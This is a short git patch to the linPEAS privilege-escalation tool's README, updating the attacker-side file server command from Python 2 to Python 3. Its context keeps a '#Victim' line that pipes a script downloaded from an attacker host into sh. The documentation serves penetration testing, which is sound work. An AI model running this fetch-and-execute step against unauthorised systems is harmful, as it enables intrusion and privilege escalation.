From 46033a7af05e0808c240b73e047d259f4925a001 Mon Sep 17 00:00:00 2001 From: Riqky <43852754+Riqky@users.noreply.github.com> Date: Tue, 20 Dec 2022 13:46:59 +0100 Subject: [PATCH] Update README.md Update python webserver to python 3 command, since python 2 is EOL. --- linPEAS/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/linPEAS/README.md b/linPEAS/README.md index 1b99b1d..1f89083 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas ```bash # Local network -sudo python -m SimpleHTTPServer 80 #Host +sudo python -m http.server 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl